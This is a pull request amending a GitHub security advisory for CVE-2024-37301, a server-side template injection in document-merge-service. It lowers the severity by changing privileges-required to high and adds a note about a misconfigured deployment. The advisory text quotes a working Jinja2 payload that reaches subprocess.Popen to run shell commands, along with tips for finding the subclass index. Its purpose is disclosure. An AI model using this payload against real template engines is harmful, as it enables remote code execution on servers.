### PR TITLE
[GHSA-v5gf-r78h-55q6] document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection

### DIFF
--- a/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json
+++ b/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json
@@ -1,17 +1,17 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-v5gf-r78h-55q6",
-  "modified": "2024-06-12T19:21:00Z",
+  "modified": "2024-06-12T19:21:02Z",
   "published": "2024-06-11T20:22:55Z",
   "aliases": [
     "CVE-2024-37301"
   ],
   "summary": "document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection",
-  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nIt has not been patched.\n\n### References\n_Are there any links users can visit to find out more?_\n\n- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti\n\n### POC\n\nAdd the following to a document, upload and render it:\n\n```jinja2\n{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} \nls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"ls -a\", shell=True, stdout=-1).communicate()[0].strip() }}\n\nwhoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"whoami\", shell=True, stdout=-1).communicate()[0].strip() }}\n\nuname -a:\n{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"uname -a\", shell=True, stdout=-1).communicate()[0].strip() }}\n\n{% endif %}\n```\n\nThe index might be different, so to debug this first render a template with `{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}` and then get the index of `subprocess.Popen` and replace 202 with that.\n\n![image](https://github.com/adfinis/document-merge-service/assets/110528300/0a1dfcff-2eba-40f1-af9c-08c8ec2bc0a1)\n\n",
+  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nA remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nIt has not been patched.\n\n### References\n_Are there any links users can visit to find out more?_\n\n- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti\n\n### POC\n\nAdd the following to a document, upload and render it:\n\n```jinja2\n{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} \nls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"ls -a\", shell=True, stdout=-1).communicate()[0].strip() }}\n\nwhoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"whoami\", shell=True, stdout=-1).communicate()[0].strip() }}\n\nuname -a:\n{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202](\"uname -a\", shell=True, stdout=-1).communicate()[0].strip() }}\n\n{% endif %}\n```\n\nThe index might be different, so to debug this first render a template with `{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}` and then get the index of `subprocess.Popen` and replace 202 with that.\n\n![image](https://github.com/adfinis/document-merge-service/assets/110528300/0a1dfcff-2eba-40f1-af9c-08c8ec2bc0a1)\n\n(note: the service would not run as root if configured correctly)\n",
   "severity": [
     {
       "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
+      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
     }
   ],
   "affected": [


### PR DESCRIPTION
**Updates**
- Affected products
- CVSS v3
- Description

**Comments**
- privileges required changed from low to high, as an attacker requires the permissions to create templates which isn't something a "normal" user is able to do (when configured correctly)

- add note about the screenshot, system was heavily misconfigured and therefore the service ran as root, when not misconfigured it would run as the user `document-merge-service` with UID 901